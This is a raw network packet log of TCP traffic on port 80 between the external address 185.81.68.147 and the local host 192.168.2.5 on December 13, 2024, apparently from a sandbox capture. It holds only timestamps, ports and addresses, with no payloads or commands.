Dec 13, 2024 01:37:08.012725115 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.012837887 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.012967110 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.013770103 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.013823986 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.013950109 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.014563084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.014666080 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.014791965 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.015449047 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.015557051 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.015685081 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.016345024 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.016462088 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.016588926 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.017271042 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.017390013 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.017519951 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.018193960 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.018364906 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.018493891 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.019098043 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.019186020 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.019320965 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.020029068 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.020086050 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.020212889 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.020929098 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.021128893 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.021258116 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.021831036 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.022015095 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.022142887 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.022756100 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.022871017 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.023034096 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.023653984 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.023782015 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.023927927 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.024561882 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.024684906 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.024812937 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.025469065 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.025600910 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.025729895 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.026382923 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.026456118 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.026583910 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.027256012 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.027455091 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.027584076 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.028173923 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.028228998 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.028357029 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.029090881 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.029227972 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.029357910 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.029997110 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.030142069 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.030271053 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.030924082 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.031048059 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.031181097 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.031826019 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.031965017 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.032092094 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.032720089 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.032840967 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.032968044 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.033639908 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.033760071 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.033890009 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.034548044 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.034718990 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.034847975 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.035465956 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.035520077 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.035645962 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.036369085 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.036535978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.036664009 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.037269115 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.037399054 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.037529945 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.038192987 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.038322926 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.038450956 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.039206982 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.039340973 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.039465904 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.039999008 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.040122032 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.040249109 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.040923119 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.041134119 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.041264057 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.041822910 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.041934013 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.042059898 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.042778015 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.042872906 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.043000937 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.043647051 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.043761969 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.043893099 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.044569016 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.044634104 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.044764996 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.045419931 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.098417997 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.189466000 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.189570904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.189709902 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.189867020 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.190015078 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.190067053 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.190109015 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.190943003 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.191025972 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.191034079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.191823959 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.191905022 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.191914082 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.192743063 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.192819118 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.192878008 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.193630934 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.193711996 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.193757057 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.194549084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.194614887 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.194622993 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.195466042 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.195542097 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.195590019 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.196358919 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.196445942 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.196492910 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.197262049 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.197354078 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.197431087 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.198193073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.198273897 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.198308945 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.199134111 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.199198961 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.199225903 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.200015068 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.200073957 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.200114012 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.200916052 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.200994968 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.201034069 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.201802969 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.201893091 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.201931000 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.202727079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.202805042 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.202841043 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.203643084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.203722000 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.203732967 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.204545021 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.204598904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.204616070 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.205436945 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.205512047 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.205549955 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.206330061 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.206396103 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.206455946 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.207279921 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.207345963 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.207376957 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.208178997 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.208257914 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.208296061 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.209081888 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.209178925 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.209261894 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.210004091 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.210072994 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.210127115 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.210949898 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.211030006 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.211059093 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.211822033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.211893082 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.211945057 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.212702990 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.212781906 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.212853909 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.213641882 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.213711977 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.213730097 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.214567900 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.214643955 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.214669943 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.215462923 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.215543032 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.215590000 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.216360092 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.216435909 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.216475010 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.217274904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.217351913 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.217396021 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.218190908 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.218267918 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.218313932 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.219156027 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.219221115 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.219266891 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.220016956 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.220097065 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.220115900 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.220916033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.220993042 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.221026897 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.221813917 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.221896887 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.221930981 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.222728968 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.222788095 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.222824097 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.223642111 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.223705053 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.223752975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.224558115 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.224618912 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.224663019 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.225449085 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.225516081 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.225560904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.226386070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.226469994 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.226489067 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.227278948 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.227359056 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.227402925 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.228194952 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.228266954 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.228296995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.229110956 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.229183912 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.229248047 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.230006933 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.230086088 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.230127096 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.230925083 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.231002092 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.231041908 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.231853962 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.231931925 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.231936932 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.232743979 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.232821941 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.232856989 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.233628988 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.233707905 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.233757973 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.234556913 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.234633923 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.234667063 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.235459089 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.235532999 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.235575914 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.236387014 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.236468077 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.236484051 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.285912991 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.381438971 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.381578922 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.381711960 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.381810904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.382000923 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.382119894 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.382714987 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.382833958 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.382944107 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.383635044 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.383758068 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.383865118 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.384563923 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.384598970 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.384704113 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.385468006 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.385588884 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.385701895 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.386359930 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.386441946 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.386563063 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.387264013 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.387387037 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.387494087 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.388180017 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.388264894 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.388379097 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.389101028 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.389205933 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.389312029 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.389998913 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.390145063 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.390259981 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.390944958 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.391060114 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.391165018 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.391841888 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.391940117 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.392049074 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.392714977 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.392827988 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.392940998 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.393642902 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.393755913 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.393863916 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.394539118 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.394651890 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.394761086 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.395461082 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.395590067 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.395710945 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.396369934 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.396471977 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.396585941 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.397267103 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.397413015 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.397526979 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.398196936 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.398308039 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.398418903 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.399087906 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.399271011 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.399384022 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.400029898 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.400160074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.400418997 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.400950909 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.401004076 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.401128054 CET	49707	80	192.168.2.5	185.81.68.147
